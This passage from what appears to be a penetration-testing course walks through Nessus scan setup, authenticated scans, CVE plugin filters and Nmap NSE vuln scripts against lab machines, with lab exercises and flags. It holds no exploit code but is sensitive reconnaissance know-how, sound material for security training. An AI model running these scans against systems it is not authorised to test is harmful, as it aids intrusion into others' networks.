In this demonstration, we've customized the Basic Network Scan template to only scan two specific TCP ports. But even in the default settings of this template, Nessus does not scan UDP ports. If we want to activate UDP port scanning, we need to manually configure it. We may miss crucial information on UDP services when it's disabled during assessments, but we need to understand that activating UDP port scanning will vastly increase the scan duration. Due to the nature of UDP, it is not often possible to tell the difference between an open and a filtered port.

To save time and scan the targets more quietly, we will turn off Host Discovery because we know the hosts are available. We do this by navigating to Discovery > Host Discovery where we toggle Ping the remote host to Off.

Figure 17: Disable Host Ping in Discovery Settings
Figure 17: Disable Host Ping in Discovery Settings

During the configuration of the scan definition, we did not configure any credentials, which implies that this scan will run unauthenticated.

We also didn't change the default settings of the ASSESSMENT menu in the Basic Network Scan template. This means the brute forcing of user credentials will not be done. Even though brute forcing is disabled, our scan creates a lot of network traffic and because we're scanning multiple hosts, will be highly noticeable.

Now that we have a basic understanding of how we can customize templates to fit our needs, we can launch our first scan. We can do this by clicking on the arrow next to Save and selecting Launch.

Figure 18: Launching the Scan
Figure 18: Launching the Scan

Initially, the scan will have a status of Running in the Nessus dashboard under My Scans.

Figure 19: Running Scan in the Nessus Dashboard
Figure 19: Running Scan in the Nessus Dashboard

Figure 19 shows the running scan and provides the options to stop or pause it. Once the scan is finished, the status will change to Completed.

Figure 20: Completed Scan in the Nessus Dashboard
Figure 20: Completed Scan in the Nessus Dashboard

This concludes our first vulnerability scan with Nessus. In the next Learning Unit, we'll examine the results of the scan.

Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Name
(Click to sort ascending)
IP Address
Vulnerability Scanning - Performing a Vulnerability Scan - VM Group 1
Start Vulnerability Scanning - Performing a Vulnerability Scan - VM Group 1 with Kali browser access

Labs

  1. Follow the steps above to create your own unauthenticated vulnerability scan on ports 80 and 443 on the machines from VM Group
  2. Review the REPORT menu of the scan configuration, which is shown in Figure 13 and check what is the only enabled option in the Output section. Enter the name of the activated checkbox.

7.2.4. Analyzing the Results
7.2.4. 分析結果

In this section, we will analyze the results of our first vulnerability scan.
在本節中,我們將分析第一次漏洞掃描的結果。

Warning 警告

The VM group required for this section is different than the previous VM group. Please make sure to start and use the VM group at the bottom of this section.
本部分所需的 VM 組與之前的 VM 組不同。請確保啟動並使用本部分底部的 VM 組。

Due to the continuous updates of Nessus and its plugins, the scan results can differ slightly. We can click on the scan in the My Scans list to get to the results dashboard.
由於 Nessus 及其外掛程式的不斷更新,掃描結果可能略有不同。我們可以按兩下「我的掃描」清單中的掃描以進入結果儀錶板。

Figure 21: Result Dashboard
Figure 21: Result Dashboard
圖 21:結果儀錶板

The initial view displays the Hosts page, which lists all scanned hosts and provides a visual representation of the vulnerability data. This allows us to identify important findings in one glance and gives us an overview of the security status of each system. On the bottom right, Nessus displays a visual representation of the distribution of all targets' vulnerability information. Above it, we can find general information about the vulnerability scan.
初始檢視顯示「主機」頁面,其中列出了所有掃描的主機,並提供了漏洞數據的可視化表示形式。這使我們能夠一目了然地識別重要發現,並讓我們瞭解每個系統的安全狀態。在右下角,Nessus 顯示所有目標漏洞資訊分佈的可視化表示。在它上面,我們可以找到有關漏洞掃描的一般資訊。

Nessus plugins are frequently updated. Therefore, the findings, groupings, and information presented in this Learning Unit may differ slightly from the results of your vulnerability scans.

To get the list of findings from a specific host, we can click on a list entry. This shows us the list of vulnerabilities from the selected host. Let's click on the entry for 192.168.50.124.

Figure 22: Vulnerability Result Dashboard of 192.168.50.124
Figure 22: Vulnerability Result Dashboard of 192.168.50.124

The Severity column gives us a quick indicator if this is a critical finding or not. Figure 22 also shows us that there are three findings with the MIXED severity. Nessus uses this severity when it groups findings. The Count column shows us how many findings the corresponding group contains. We can click on a grouped finding to display a list of all findings in this group. Let's click on Apache Httpd (Multiple Issues), which is listed as Web Servers under the Family column.

Figure 23: List of Grouped Findings
Figure 23: List of Grouped Findings

Figure 23 shows us information on the findings, which were previously grouped. We can get more information by clicking on a finding. Let's click on Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability.

Figure 24: Detailed Information of a Finding
Figure 24: Detailed Information of a Finding

Each finding contains a huge amount of information about the vulnerability itself, as well as the plugin that detected it. Furthermore, we get a lot of information about the associated risk, status of exploits, and other references.

Next, let's navigate back to the results dashboard shown in Figure 21 to explore our scan further.

Analyzing the findings of a single target provides us with a lot of detailed information. However, we often want to get an overview of the most important vulnerabilities of all targets. To achieve this, Nessus provides a handy feature to get a prioritized overview of vulnerabilities named VPR Top Threats, which utilizes the Vulnerability Priority Rating (VPR). The findings in the VPR list consist of the top ten vulnerabilities of the scan.

Figure 25: VPR List of Vulnerabilities
Figure 25: VPR List of Vulnerabilities

In our example, the list only contains six vulnerabilities as Nessus didn't find more with our configuration.

Depending on the version of Nessus, the tab VPR Top Threats may be missing while following along. However, each vulnerability finding still contains the Vulnerability Priority Rating.

The next page we'll examine is Remediations. If Nessus detects a vulnerability, the plugins often contain a remediation strategy or information on how to mitigate the vulnerability. In the case of the Apache vulnerabilities from Figure 22, we get the following information.

Figure 26: Remediation of Vulnerabilities
Figure 26: Remediation of Vulnerabilities

The last report page is History. This page lists all vulnerability scans with this configuration. We can use it to review or compare the results of previous scans.

We now have an understanding of how to view the results of a Nessus scan. Next, let's create a PDF report of our vulnerability scan. We can do this by using the functions in the Report dashboard. Apart from the creation of a report, the functions also cover the change of the scan configuration, the launch of another scan, or exporting data. We can also configure an Audit Trail, which allows us to analyze why a specific plugin behaved in a certain way. It can be used to reduce the number of false negatives.

Let's create a PDF report for our first vulnerability scan by clicking Report.

Figure 27: Create a Report
Figure 27: Create a Report

Once we click on the button, a new window allows us to use different report templates. Each template generates a report with a different structure, focus, and content.

For this example, we'll use the Detailed Vulnerabilities By Host template, which presents detailed findings grouped by each host. We'll then select PDF as the format and click Generate Report.

Figure 28: Select the Report Format and Template
Figure 28: Select the Report Format and Template

After this, we can download or open the PDF report.

We could also use the Complete List of Vulnerabilities by Host template to create a summary of the vulnerabilities instead of including detailed information.

For more information on how to customize the reports, consult the scan exports and reports section on the Tenable Documentation1(https://docs.tenable.com/nessus/Content/ScanReportFormats.htm) page.

In the last two sections, we performed a vulnerability scan, reviewed the results, and generated a PDF report with detailed information for all hosts. We can get more familiar with Nessus by customizing the scan configurations and analyzing how the scanning behavior and results differ.

1

1 ↩︎

Resources 資源

Some of the labs require you to start the target machine(s) below.
某些實驗室要求您啟動以下目標計算機。

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
請注意,分配給目標計算機的IP位址可能與模組文本和視頻中引用的IP位址不匹配。

Name
(Click to sort ascending)
IP Address
Vulnerability Scanning - Performing a Vulnerability Scan - VM #5
漏洞掃描 - 執行漏洞掃描 - VM #5
Start Vulnerability Scanning - Performing a Vulnerability Scan - VM #5 with Kali browser access
Vulnerability Scanning - Analyzing the Results - VM Group 1
漏洞掃描 - 分析結果 - VM 組 1
Start Vulnerability Scanning - Analyzing the Results - VM Group 1 with Kali browser access

Labs 實驗室

  1. In the section "Performing a Vulnerability scan" we launched a vulnerability scan on four target machines. Follow the steps outlined in this section to review the results of this scan and analyze the Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability finding. The finding contains a field named Exploit Code Maturity. Enter the value of this field as an answer to this exercise.
    在「執行漏洞掃描」一節中,我們在四台目標計算機上啟動了漏洞掃描。按照本節中概述的步驟查看此掃描的結果,並分析 Apache 2.4.49 < 2.4.51 路徑遍歷漏洞發現。該結果包含一個名為“漏洞利用代碼成熟度”的欄位。輸入此欄位的值作為本練習的答案。
  1. Perform an unauthenticated vulnerability scan on the same four machines (VM Group 1) as in the previous exercise, but only scan port 8080. Once the scan finishes, review the scan results and identify a host with the grouped finding HTTP (Multiple Issues). Find HTTP Server Type and Version and enter the Jetty version found.
    在與上一練習相同的四台計算機(虛擬機組 1)上執行未經身份驗證的漏洞掃描,但僅掃描埠 8080。掃描完成後,查看掃描結果並識別具有分組結果 HTTP (多個問題) 的主機。找到 HTTP 伺服器類型和版本,然後輸入找到的 Jetty 版本。
  1. Nessus can build a Sitemap of a target web server. A Sitemap provides information about the content of a web server (e.g. pages). Nessus builds it by crawling through links it identifies on pages. Scan the four target machines ( VM Group 1) on port 9999 with the Basic Network Scan template. To configure Nessus to build a Sitemap, click on the Assessment settings in the scan configuration and select Custom in the dropdown menu. Next, click on Web Applications and activate Scan web applications. After this, launch the scan. Once it is finished, review the results and analyze the findings on the Web Application Sitemap . The output provides a list of found pages. On one of these pages, you will find the flag.
  1. The victim machine VM #5 is running a server that contains several vulnerabilities. One vulnerability allows for directory traversal and arbitrary file access on the target system. Use Nessus to perform a Basic Network Scan of the victim. Make sure to configure the scan to assess all ports. Once the scan is completed, examine the discovered vulnerability in the results. As a part of the scan, Nessus was able to read the file C:\Windows\win.ini as a proof of concept of this exploit. Expand the vulnerability results to view the full content of the retrieved file and locate the embedded flag.

7.2.5. Performing an Authenticated Vulnerability Scan
7.2.5. 執行經過身份驗證的漏洞掃描

In this section, we will perform an authenticated vulnerability scan by providing credentials to Nessus. As we discussed previously, authenticated scans produce more detailed information and reduce the number of false positives. To demonstrate this, we will use an authenticated vulnerability scan against the target DESKTOP.
在本節中,我們將通過向 Nessus 提供憑據來執行經過身份驗證的漏洞掃描。正如我們之前所討論的,經過身份驗證的掃描會產生更詳細的信息並減少誤報的數量。為了證明這一點,我們將對目標桌面使用經過身份驗證的漏洞掃描。

We need to consider that an authenticated scan not only creates a lot of traffic on the network but also a huge amount of noise on the system itself, such as log entries and AV notifications.
我們需要考慮的是,經過身份驗證的掃描不僅會在網路上產生大量流量,還會在系統本身上產生大量噪音,例如日誌條目和 AV 通知。

To begin, we'll click New Scan on the Nessus dashboard.
首先,我們將按兩下Nessus儀錶板上的「新建掃描」。

Figure 29: Creating a new Scan
Figure 29: Creating a new Scan
圖 29:創建新掃描

Even though all Nessus templates accept user credentials, we'll use the Credentialed Patch Audit scan template, which comes preconfigured to execute local security checks against the target.
儘管所有 Nessus 範本都接受使用者憑證補據,但我們仍將使用憑證補丁審核掃描範本,該範本已預先配置為針對目標執行本地安全檢查。

The difference between this and the Basic Network Scan template with provided credentials is that the Credentialed Patch Audit scan only uses local security checks and will not do a regular vulnerability check from an external perspective. The Credentialed Patch Audit template will not only scan for missing operating system patches but also for outdated applications, which may be vulnerable to privilege escalation attacks.

Figure 30: Select Credentialed Patch Audit
Figure 30: Select Credentialed Patch Audit

Once again, we will provide a name for the scan and set the target to DESKTOP.

Figure 31: Basic Settings for the Authenticated Scan
Figure 31: Basic Settings for the Authenticated Scan

Next, let's click on the Credentials tab and select SSH in the Host category. On the Authentication method dropdown, we'll select password, and enter "offsec" as the username and "lab" as the password. We'll select sudo for the Elevate privileges with option and enter "root" as the sudo user and "lab" as the password.

Figure 32: SSH and Sudo Credentials for the Authenticated Scan
Figure 32: SSH and Sudo Credentials for the Authenticated Scan

While we will use the SSH configuration for this example, there are several other authentication mechanisms available. To get a list of all available mechanisms, we can click the Categories dropdown menu and select All. We can consult the Tenable Documentation for a complete list of supported authentication mechanisms.

For Linux and macOS targets, SSH is used. While we can also use SSH on Windows, in most cases, we will use Server Message Block (SMB) and Windows Management Instrumentation (WMI) to perform authenticated vulnerability scans against Windows targets. Both methods allow us to use local or domain accounts and different authentication options.

To get meaningful results in an authenticated vulnerability scan, we need to ensure that our target system is configured correctly. Depending on the authentication method we want to use, we need to make sure that there is no firewall blocking connections from our scanner. Furthermore, we often find antivirus (AV) programs installed on both Linux and Windows targets. AV may flag the vulnerability scan as malicious and therefore, terminate our connection or render the results useless. Depending on the AV program, we can add an exception for the authenticated scan or temporarily disable it.

Another Windows security technology we need to consider is User Account Control (UAC). UAC is a security feature for Windows that allows users to use standard privileges instead of administrator privileges. An administrative user will run most applications and commands with standard privileges and receive administrator privileges only when needed.

Due to the nature of UAC, it can also interfere with our scan. We can configure UAC to allow Nessus or temporarily disable it. We should consult the Tenable Documentation, especially for Windows targets before we start our first authenticated scan.

Our scan target is a Linux system without AV. Therefore, we can click the arrow next to Save and launch the scan. After the scan has finished, we can review the results. On the Vulnerabilities page, we get a list of the findings for the authenticated scan. In the last section, we had already grouped findings with the MIXED severity. For our authenticated scan, let's disable the grouping of findings by clicking on the wheel and selecting Disable Groups.

Figure 33: Disable Grouped Results
Figure 33: Disable Grouped Results

After we disable groups, each finding is listed separately.

Figure 34: Authenticated Scan Results
Figure 34: Authenticated Scan Results

We get a list of vulnerabilities from Ubuntu where they have a Ubuntu Local SecurityChecks and in that, there is a plugin family.

Plugins grouped into plugin families check for vulnerabilities in the same context. For example, there are separate plugin families for checking vulnerabilities in databases, firewalls, or web servers. The Ubuntu Local Security Checks plugin family contains a multitude of plugins that check for local vulnerabilities and missing patches for Ubuntu.

The Name column provides us with the vulnerable Ubuntu versions and a brief description as well as the patch number for the vulnerabilities.

Figure 35: Vulnerability data of Firefox and curl
Figure 35: Vulnerability data of Firefox and curl

The list also contains vulnerability data of locally exposed applications such as Firefox or cURL.

Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Name
(Click to sort ascending)
IP Address
Vulnerability Scanning - Authenticated Scan - VM #1
Start Vulnerability Scanning - Authenticated Scan - VM #1 with Kali browser access

Labs 實驗室

  1. Follow the steps above to perform an authenticated vulnerability scan on VM #1. Review the results of the scan and analyze the "Patch Report" finding. The report identifies missing patches, with one specifically related to the Heimdal package. Can you provide the corresponding Ubuntu Security Notice (USN) number?
    按照上述步驟在 VM #1 上執行經過身份驗證的漏洞掃描。查看掃描結果並分析「補丁報告」 結果。該報告確定了缺失的補丁,其中一個與 Heimdal 軟體包特別相關。您能否提供相應的 Ubuntu 安全通知 (USN) 編號?
  1. Additionally, analyze the "OS Identification and Installed Software Enumeration over SSH v2 (Using New SSH Library)" finding. The finding includes the output of the uname -a command. What is the kernel version of the DESKTOP system?

7.2.6. Working with Nessus Plugins

By default, Nessus will enable several plugins behind the scenes when running a default template. While this is certainly useful in many scenarios, we can also fine-tune our options to quickly run a single plugin. We can use this feature to validate a previous finding or to quickly discover all the targets in an environment that are at risk of a specific vulnerability.

For this example, we will set a plugin filter to identify if the DESKTOP machine is vulnerable to CVE-2021-3156. This is a locally exploitable vulnerability that allows an unprivileged user to elevate privileges to root.

To leverage the dynamic plugin filter, we will once again begin with a New Scan.

Figure 36: Creating a new Scan
Figure 36: Creating a new Scan

This time, we will use the Advanced Dynamic Scan template. This template allows us to use a dynamic plugin filter instead of manually enabling or disabling plugins.

To use this template, we click on Advanced Dynamic Scan.

Figure 37: Select Advanced Dynamic Scan
Figure 37: Select Advanced Dynamic Scan

Once again, we'll configure the name and target.

Figure 38: Enter Name and Target
Figure 38: Enter Name and Target
圖 38:輸入名稱和目標

Next, we'll provide the same SSH and sudo credentials we used in the last example, meaning we'll also be conducting an authenticated scan.
接下來,我們將提供與上一個示例相同的 SSH 和 sudo 憑據,這意味著我們還將執行經過身份驗證的掃描。

Now we can select the plugins we want to use in our vulnerability scan. As stated before, the Advanced Dynamic Scan allows us to use a filter instead of enabling or disabling groups or individual plugins.
現在我們可以選擇要在漏洞掃描中使用的外掛程式。如前所述,高級動態掃描允許我們使用篩檢程式,而不是啟用或禁用組或單個外掛程式。

To do so, let's click on the Dynamic Plugins tab. In the left dropdown menu, we'll select CVE to filter for a specific CVE. In the middle dropdown menu, we can choose from different filter arguments to specify the matching behavior. On the right dropdown menu, we can specify a CVE number. After entering "CVE-2021-3156", we can click on Preview Plugins. This may take a few minutes to complete.
為此,讓我們按兩下動態外掛程式選項卡。在左側下拉功能表中,我們將選擇 CVE 來篩選特定的 CVE。在中間的下拉功能表中,我們可以從不同的過濾器參數中進行選擇來指定匹配行為。在右側下拉功能表中,我們可以指定一個 CVE 編號。輸入“CVE-2021-3156”后,我們可以按兩下預覽外掛程式。這可能需要幾分鐘才能完成。

Figure 39: Filter for specific Plugins
Figure 39: Filter for specific Plugins
圖 39:篩選特定外掛程式

Once Preview Plugins is finished running, we get a list of found plugin families that cover this particular CVE.
預覽外掛程式完成運行後,我們會得到一個找到的涵蓋此特定 CVE 的外掛程式系列清單。

Figure 40: Select Family of Plugins covering CVE-2021-3156
Figure 40: Select Family of Plugins covering CVE-2021-3156
圖 40:選擇涵蓋 CVE-2021-3156 的外掛程式系列

One very handy feature of the dynamic plugin filter is the ability to combine multiple filters. In this example, we know that the target is an Ubuntu Linux system and we can therefore use a second filter to specify the related plugin family. Let's add a new filter by clicking on the plus button next to the first filter.
動態外掛程式過濾器的一個非常方便的功能是能夠組合多個篩檢程式。在此示例中,我們知道目標是UbuntuLinux系統,因此我們可以使用第二個篩檢程式來指定相關的外掛程式系列。讓我們通過單擊第一個篩檢程式旁邊的加號按鈕來添加一個新篩檢程式。

Figure 41: Add Filter
Figure 41: Add Filter
圖 41:添加篩選器

A new plugin filter appears. To restrict the plugin family to specific checks for Ubuntu, let's select Plugin Family on the left dropdown and Ubuntu Local Security Checks on the right dropdown.
此時將顯示一個新的外掛程式篩檢程式過濾器。要將外掛程式系列限制為 Ubuntu 的特定檢查,讓我們在左側下拉清單中選擇外掛程式系列,在右側下拉清單中選擇 Ubuntu 本地安全檢查。

Figure 42: Combined Plugin Filters
Figure 42: Combined Plugin Filters
圖 42:組合外掛程式篩選器

Depending on the version of Nessus, the dropdown menu on the right may not display any values. In this case, we can remove the second plugin filter and proceed without it.
根據 Nessus 的版本,右側的下拉功能表可能不會顯示任何值。在這種情況下,我們可以刪除第二個外掛程式過濾器並在沒有它的情況下繼續。

We can then click on Preview Plugins again to list the plugins determined by our filters. After it completes, let's click on the dropdown and choose Ubuntu Local Security Checks. Nessus displays information about the plugin, including affected Ubuntu versions, a short description, and patch number, as well as the Plugin ID.
然後,我們可以再次按兩下「預覽外掛程式」以列出由我們的過濾器確定的外掛程式。完成後,讓我們按兩下拉清單並選擇Ubuntu本地安全檢查。Nessus 顯示有關外掛程式的資訊,包括受影響的 Ubuntu 版本、簡短描述和補丁編號,以及外掛程式 ID。

Figure 43: Ubuntu Local Security Check Plugin for CVE-2021-3156
Figure 43: Ubuntu Local Security Check Plugin for CVE-2021-3156
圖 43:適用於 CVE-2021-3156 的 Ubuntu 本地安全檢查外掛程式

We can get more information by clicking on the plugin. Figure 44 shows the detailed information of the specified plugin.
我們可以通過單擊外掛程式獲取更多資訊。圖 44 顯示了指定外掛程式的詳細資訊。

Figure 44: Detailed Information of Plugin 145463
Figure 44: Detailed Information of Plugin 145463

After closing this window, we can launch the vulnerability scan as we did before.

Once the scan is finished, let's review the results by clicking on the Vulnerabilities tab.

Figure 45: Listed Findings of the Advanced Dynamic Scan
Figure 45: Listed Findings of the Advanced Dynamic Scan

The output lists one finding with a HIGH severity, which was found by the plugin we specified with our dynamic plugin filter. Figure 46 shows the detailed information of the finding, confirming that the target is vulnerable to CVE-2021-3156.

Figure 46: Detailed Information about the Findings of the specified Plugins
Figure 46: Detailed Information about the Findings of the specified Plugins

The plugin output also contains information stating that Nessus only used the reported version number of the affected application and that it did not try to confirm the vulnerability by exploiting it in any way. In an assessment, we should verify these kinds of results to check if it is indeed an exploitable vulnerability.

Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Name
(Click to sort ascending)
IP Address
Vulnerability Scanning - Working with Nessus Plugins - VM #1
Start Vulnerability Scanning - Working with Nessus Plugins - VM #1 with Kali browser access
Vulnerability Scanning - Working with Nessus Plugins - VM #2
Start Vulnerability Scanning - Working with Nessus Plugins - VM #2 with Kali browser access

Labs

  1. Follow the steps above to perform the vulnerability scan on VM #1 with the specified plugin filter. Click on the vulnerability provided by the plugin on the Vulnerabilities result page and enter the date when a patch for this vulnerability was published. The information can be found in the Vulnerability Information area under the Patch Pub Date on the right sidebar.
  1. The target machine VM #2 is running an IIS web server. Perform an Advanced Dynamic Scan on this system with the default settings of this template and specify the Plugin ID 11714 in a Plugin Filter. Once the scan completes, examine the discovered information and locate the flag embedded in the disclosed path. Keep in mind, that Nessus shows some special characters like "{" or "}" as Unicode Hex characters. To provide the correct flag, you will need to substitute these characters.

7.3. Vulnerability Scanning with Nmap
7.3. 使用 Nmap 掃描漏洞

This Learning Unit covers the following Learning Objectives:
本學習單元涵蓋以下學習目標:

  • Understand the basics of the Nmap Scripting Engine (NSE)
    瞭解 Nmap 腳稿引擎 (NSE) 的基礎知識
  • Perform a lightweight Vulnerability Scan with Nmap
    使用 Nmap 執行輕量級漏洞掃描
  • Work with custom NSE scripts
    使用自定義 NSE 腳本

In this Learning Unit, we will explore the Nmap Scripting Engine (NSE) and how to leverage Nmap as a lightweight vulnerability scanner. In addition, we will learn about the NSE script categories, how to use NSE scripts in Nmap, and how to work with custom NSE scripts.
在本學習單元中,我們將探討 Nmap 腳本引擎 (NSE) 以及如何利用 Nmap 作為輕量級漏洞掃描程式。此外,我們還將瞭解 NSE 腳本類別、如何在 Nmap 中使用 NSE 腳本以及如何使用自定義 NSE 腳本。

7.3.1. NSE Vulnerability Scripts
7.3.1. NSE 漏洞腳本

As an alternative to Nessus, we can also use the NSE to perform automated vulnerability scans. NSE scripts extend the basic functionality of Nmap to do a variety of networking tasks. These tasks are grouped into categories around cases such as vulnerability detection, brute forcing, and network discovery. The scripts can also extend the version detection and information-gathering capabilities of Nmap.
作為 Nessus 的替代方案,我們還可以使用 NSE 執行自動漏洞掃描。NSE 腳本擴展了 Nmap 的基本功能,以執行各種網路任務。這些任務圍繞漏洞檢測、暴力破解和網路發現等情況進行分組。這些腳本還可以擴展Nmap的版本檢測和資訊收集功能。

An NSE script can have more than one category. For example, it can be categorized as safe and vuln, or intrusive and vuln. Scripts categorized as "safe" have no potential impact to stability, while scripts in the "intrusive" category might crash a target service or system. To avoid any stability issues, it's imperative to check how the scripts are categorized and we should never run an NSE script or category without understanding the implications. We can determine the categories of a script by browsing the NSE Documentation or locally in the NSE scripts directory.
一個 NSE 腳本可以有多個類別。例如,它可以歸類為安全和脆弱,或侵入性和脆弱。歸類為「安全」的腳本對穩定性沒有潛在影響,而「侵入性」類別的腳本可能會使目標服務或系統崩潰。為了避免任何穩定性問題,必須檢查腳本的分類方式,我們永遠不應該在不瞭解其含義的情況下運行 NSE 腳本或類別。我們可以通過流覽 NSE 文件或本地 NSE 文稿目錄來確定文稿的類別。

In this section, we will focus on the vuln category to leverage Nmap as a lightweight vulnerability scanner.
在本節中,我們將重點介紹漏洞類別,以利用 Nmap 作為輕量級漏洞掃描程式。

On our Kali VM, the NSE scripts can be found in the /usr/share/nmap/scripts/ directory with the .nse filetype. This directory also contains the script.db file, which serves as an index to all currently available NSE scripts. We can use it to get a list of scripts in the vuln category.
在我們的 Kali VM 上,可以在 /usr/share/nmap/scripts/ 目錄中找到 NSE 腳本,檔類型為 .nse。此目錄還包含 script.db 檔,該檔用作所有當前可用的 NSE 腳本的索引。我們可以使用它來獲取 vuln 類別中的腳本清單。

kali@kali:~$ cd /usr/share/nmap/scripts/

kali@kali:/usr/share/nmap/scripts$ cat script.db  | grep "\"vuln\""
Entry { filename = "afp-path-vuln.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "broadcast-avahi-dos.nse", categories = { "broadcast", "dos", "intrusive", "vuln", } }
Entry { filename = "clamav-exec.nse", categories = { "exploit", "vuln", } }
Entry { filename = "distcc-cve2004-2687.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "dns-update.nse", categories = { "intrusive", "vuln", } }
...

Listing 4 - The Nmap script database
清單 4 - Nmap 腳本資料庫

Each entry has a file name and categories. The file name represents the name of the NSE script in the NSE directory.
每個條目都有一個檔名和類別。檔名表示 NSE 目錄中 NSE 腳本的名稱。

Some of the standard NSE scripts are quite outdated. Fortunately, the vulners script was integrated, which provides current vulnerability information about detected service versions from the Vulners Vulnerability Database. The script itself has the categories safe, vuln, and external.
一些標準的 NSE 腳本已經過時了。幸運的是,漏洞腳本已集成,該腳本提供了有關從漏洞漏洞資料庫中檢測到的服務版本的最新漏洞資訊。腳本本身具有安全、易受攻擊和外部類別。

Before we start our first vulnerability scan with the NSE, we will examine the Nmap --script parameter. This parameter is responsible for determining which NSE scripts get executed in a scan. The arguments for this parameter can be a category, a Boolean expression, a comma-separated list of categories, the full or wildcard-specified name of a NSE script in script.db, or an absolute path to a specific script.
在使用 NSE 開始第一次漏洞掃描之前,我們將檢查 Nmap --script 參數。此參數負責確定在掃描中執行哪些 NSE 腳本。此參數的參數可以是類別、布爾運算式、逗號分隔的類別清單、script.db 中 NSE 腳本的完整名稱或通配符指定的名稱,也可以是特定腳本的絕對路徑。

Let's start with a Nmap scan using all of the NSE scripts from the vuln category. The command we'll use contains the previously mentioned --script parameter with the vuln argument, which specifies all of the scripts with this category. Furthermore, we'll provide -sV to activate the Nmap's service detection capabilities. Finally, we'll use -p to only scan port 443.
讓我們從使用 vuln 類別中的所有 NSE 腳本的 Nmap 掃描開始。我們將使用的命令包含前面提到的帶有 vuln 參數的 --script 參數,該參數指定具有此類別的所有腳本。此外,我們將提供 -sV 來啟動Nmap的服務檢測功能。最後,我們將使用 -p 僅掃描埠 443。

kali@kali:~$ sudo nmap -sV -p 443 --script "vuln" 192.168.50.124
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org )
...
PORT    STATE SERVICE VERSION
443/tcp open  http    Apache httpd 2.4.49 ((Unix))
...
| vulners: 
|   cpe:/a:apache:http_server:2.4.49:
...
        https://vulners.com/githubexploit/DF57E8F1-FE21-5EB9-8FC7-5F2EA267B09D	*EXPLOIT*
|     	CVE-2021-41773	4.3	https://vulners.com/cve/CVE-2021-41773
...
|_http-server-header: Apache/2.4.49 (Unix)
MAC Address: 00:0C:29:C7:81:EA (VMware)

Listing 5 - Using NSE's "vuln" category scripts against the SAMBA machine
清單 5 - 對 SAMBA 機器使用 NSE 的 “vuln” 類別腳本

Nmap detected the Apache service with version 2.4.49 and tried all of the NSE scripts from the vuln category. Most of the output comes from the vulners script, which uses the information from the detected service and version to provide related vulnerability data.
Nmap 檢測到版本為 2.4.49 的 Apache 服務,並嘗試了 vuln 類別中的所有 NSE 腳本。大部分輸出來自漏洞腳本,該腳本使用來自檢測到的服務和版本的資訊來提供相關的漏洞數據。

The vulners script not only shows us information about the CVEs found but also the CVSS scores and links for additional information. For example, Listing 5 shows that Nmap, in combination with the vulners script, detected that the target is vulnerable to CVE-2021-41773.
漏洞腳本不僅向我們顯示有關發現的 CVE 的資訊,還顯示 CVSS 分數和有關其他信息的連結。例如,清單 5 顯示 Nmap 結合漏洞腳本檢測到目標容易受到 CVE-2021-41773 的攻擊。

Another useful feature of the vulners script is that it also lists Proof of Concepts for the found vulnerabilities, which are marked with "*EXPLOIT*". However, without a successful service detection, the vulners script will not provide any results.
漏洞腳本的另一個有用功能是,它還列出了發現的漏洞的概念證明,這些漏洞標有“*EXPLOIT*”。但是,如果沒有成功的服務檢測,漏洞腳本將不會提供任何結果。

Resources 資源

Some of the labs require you to start the target machine(s) below.
某些實驗室要求您啟動以下目標計算機。

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
請注意,分配給目標計算機的IP位址可能與模組文本和視頻中引用的IP位址不匹配。

Name
(Click to sort ascending)
IP Address
Vulnerability Scanning - NSE Vulnerability Scripts - VM #1
漏洞掃描 - NSE 漏洞腳本 - VM #1
Start Vulnerability Scanning - NSE Vulnerability Scripts - VM #1 with Kali browser access

Labs 實驗室

  1. Follow the steps above and use the vuln NSE script category against VM #1. Listing 5 shows that the target is vulnerable to CVE-2021-41773, but the redacted output omits multiple additional found CVEs. Enter one of the other found CVEs from 2021.
    按照上述步驟操作,並對 VM #1 使用 vuln NSE 腳本類別。清單 5 顯示目標容易受到 CVE-2021-41773 的攻擊,但編輯后的輸出省略了多個其他發現的 CVE。輸入 2021 年發現的其他 CVE 之一。

7.3.2. Working with NSE Scripts
7.3.2. 使用 NSE 腳本

In the previous section, we learned about the vuln NSE category and the vulners script. While the vulners script provides an overview of all CVEs mapped to the detected version, we sometimes want to check for a specific CVE. This is especially helpful when we want to scan a network for the existence of a vulnerability. If we do this with the vulners script, we would need to review an enormous amount of information. For most modern vulnerabilities, we need to integrate dedicated NSE scripts manually.
在上一節中,我們瞭解了漏洞 NSE 類別和漏洞腳本。雖然漏洞腳本提供了映射到檢測到的版本的所有 CVE 的概述,但我們有時希望檢查特定的 CVE。當我們想要掃描網路以查找漏洞時,這尤其有用。如果我們使用漏洞腳本執行此操作,我們將需要查看大量資訊。對於大多數現代漏洞,我們需要手動集成專用的 NSE 腳本。

Let's practice how to do this with CVE-2021-41773. To find a suitable NSE script, we can use a search engine to find the CVE number plus NSE (CVE-2021-41773 nse).
讓我們使用 CVE-2021-41773 練習如何執行此操作。要找到合適的 NSE 腳本,我們可以使用搜尋引擎查找 CVE 編號和 NSE (CVE-2021-41773 nse)。

Figure 47: Searching for an NSE script for a specific CVE in Google
Figure 47: Searching for an NSE script for a specific CVE in Google
圖 47:在 Google 中搜尋特定 CVE 的 NSE 腳本

One of the first search results is a link to a GitHub page that provides a script to check for this vulnerability. Let's download this script and save it as /usr/share/nmap/scripts/http-vuln-cve2021-41773.nse to comply with the naming syntax of the other NSE scripts. Before we can use the script, we'll need to update script.db with --script-updatedb.
第一個搜尋結果之一是指向 GitHub 頁面的連結,該頁面提供了一個用於檢查此漏洞的腳本。讓我們下載此腳本並將其另存為 /usr/share/nmap/scripts/http-vuln-cve2021-41773.nse,以符合其他 NSE 腳本的命名語法。在使用腳本之前,我們需要使用 --script-updatedb 更新script.db。

kali@kali:~$ sudo cp /home/kali/Downloads/http-vuln-cve-2021-41773.nse /usr/share/nmap/scripts/http-vuln-cve2021-41773.nse

kali@kali:~$ sudo nmap --script-updatedb
